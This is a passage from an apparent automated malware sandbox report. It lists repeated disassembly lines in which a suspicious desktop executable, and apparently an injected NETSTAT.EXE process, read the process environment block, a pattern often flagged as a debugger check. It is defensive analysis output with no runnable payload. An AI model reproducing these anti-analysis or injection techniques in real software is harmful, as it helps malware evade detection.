          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h]2_2_00C2B260
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h]2_2_00C2B260
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B93A1C mov eax, dword ptr fs:[00000030h]2_2_00B93A1C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48A62 mov eax, dword ptr fs:[00000030h]2_2_00C48A62
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]2_2_00B75210
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov ecx, dword ptr fs:[00000030h]2_2_00B75210
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]2_2_00B75210
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]2_2_00B75210
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88A0A mov eax, dword ptr fs:[00000030h]2_2_00B88A0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB927A mov eax, dword ptr fs:[00000030h]2_2_00BB927A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h]2_2_00C3AA16
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h]2_2_00C3AA16
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]2_2_00B79240
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]2_2_00B79240
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]2_2_00B79240
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]2_2_00B79240
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]2_2_00BA4BAD
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]2_2_00BA4BAD
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]2_2_00BA4BAD
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAB390 mov eax, dword ptr fs:[00000030h]2_2_00BAB390
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2397 mov eax, dword ptr fs:[00000030h]2_2_00BA2397
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h]2_2_00B81B8F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h]2_2_00B81B8F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2D380 mov ecx, dword ptr fs:[00000030h]2_2_00C2D380
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3138A mov eax, dword ptr fs:[00000030h]2_2_00C3138A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9DBE9 mov eax, dword ptr fs:[00000030h]2_2_00B9DBE9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]2_2_00BA03E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C45BA5 mov eax, dword ptr fs:[00000030h]2_2_00C45BA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h]2_2_00BF53CA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h]2_2_00BF53CA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48B58 mov eax, dword ptr fs:[00000030h]2_2_00C48B58
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h]2_2_00BA3B7A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h]2_2_00BA3B7A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7DB60 mov ecx, dword ptr fs:[00000030h]2_2_00B7DB60
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3131B mov eax, dword ptr fs:[00000030h]2_2_00C3131B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7F358 mov eax, dword ptr fs:[00000030h]2_2_00B7F358
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7DB40 mov eax, dword ptr fs:[00000030h]2_2_00B7DB40
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48CD6 mov eax, dword ptr fs:[00000030h]2_2_00C48CD6
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8849B mov eax, dword ptr fs:[00000030h]2_2_00B8849B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C314FB mov eax, dword ptr fs:[00000030h]2_2_00C314FB
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]2_2_00BF6CF0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]2_2_00BF6CF0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]2_2_00BF6CF0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h]2_2_00C0C450
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h]2_2_00C0C450
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BABC2C mov eax, dword ptr fs:[00000030h]2_2_00BABC2C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]2_2_00BF6C0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]2_2_00BF6C0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]2_2_00BF6C0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h]2_2_00BF6C0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h]2_2_00C31C06
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]2_2_00C4740D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]2_2_00C4740D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h]2_2_00C4740D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9746D mov eax, dword ptr fs:[00000030h]2_2_00B9746D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA44B mov eax, dword ptr fs:[00000030h]2_2_00BAA44B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BA1DB5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BA1DB5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BA1DB5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA35A1 mov eax, dword ptr fs:[00000030h]2_2_00BA35A1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]2_2_00BAFD9B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]2_2_00BAFD9B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C28DF1 mov eax, dword ptr fs:[00000030h]2_2_00C28DF1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]2_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]2_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]2_2_00C405AC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]2_2_00C405AC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AD30 mov eax, dword ptr fs:[00000030h]2_2_00B7AD30
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BFA537 mov eax, dword ptr fs:[00000030h]2_2_00BFA537
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]2_2_00B9C577
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]2_2_00B9C577
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B97D50 mov eax, dword ptr fs:[00000030h]2_2_00B97D50
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48D34 mov eax, dword ptr fs:[00000030h]2_2_00C48D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB3D43 mov eax, dword ptr fs:[00000030h]2_2_00BB3D43
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3E539 mov eax, dword ptr fs:[00000030h]2_2_00C3E539
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3540 mov eax, dword ptr fs:[00000030h]2_2_00BF3540
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]2_2_00C2FEC0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48ED6 mov eax, dword ptr fs:[00000030h]2_2_00C48ED6
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF46A7 mov eax, dword ptr fs:[00000030h]2_2_00BF46A7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FE87 mov eax, dword ptr fs:[00000030h]2_2_00C0FE87
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]2_2_00BA16E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B876E2 mov eax, dword ptr fs:[00000030h]2_2_00B876E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA36CC mov eax, dword ptr fs:[00000030h]2_2_00BA36CC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]2_2_00BB8EC7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]2_2_00C3AE44
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]2_2_00C3AE44
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7E620 mov eax, dword ptr fs:[00000030h]2_2_00B7E620
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]2_2_00BAA61C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]2_2_00BAA61C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA8E00 mov eax, dword ptr fs:[00000030h]2_2_00BA8E00
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31608 mov eax, dword ptr fs:[00000030h]2_2_00C31608
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8766D mov eax, dword ptr fs:[00000030h]2_2_00B8766D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FE3F mov eax, dword ptr fs:[00000030h]2_2_00C2FE3F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88794 mov eax, dword ptr fs:[00000030h]2_2_00B88794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB37F5 mov eax, dword ptr fs:[00000030h]2_2_00BB37F5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAE730 mov eax, dword ptr fs:[00000030h]2_2_00BAE730
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]2_2_00B74F2E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]2_2_00B74F2E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48F6A mov eax, dword ptr fs:[00000030h]2_2_00C48F6A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9F716 mov eax, dword ptr fs:[00000030h]2_2_00B9F716
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]2_2_00BAA70E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]2_2_00BAA70E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]2_2_00C4070D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]2_2_00C4070D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]2_2_00C0FF10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]2_2_00C0FF10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8FF60 mov eax, dword ptr fs:[00000030h]2_2_00B8FF60
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8EF40 mov eax, dword ptr fs:[00000030h]2_2_00B8EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]4_2_03871B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]4_2_03871B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391D380 mov ecx, dword ptr fs:[00000030h]4_2_0391D380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392138A mov eax, dword ptr fs:[00000030h]4_2_0392138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389B390 mov eax, dword ptr fs:[00000030h]4_2_0389B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892397 mov eax, dword ptr fs:[00000030h]4_2_03892397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03935BA5 mov eax, dword ptr fs:[00000030h]4_2_03935BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]4_2_038E53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]4_2_038E53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388DBE9 mov eax, dword ptr fs:[00000030h]4_2_0388DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392131B mov eax, dword ptr fs:[00000030h]4_2_0392131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB40 mov eax, dword ptr fs:[00000030h]4_2_0386DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938B58 mov eax, dword ptr fs:[00000030h]4_2_03938B58
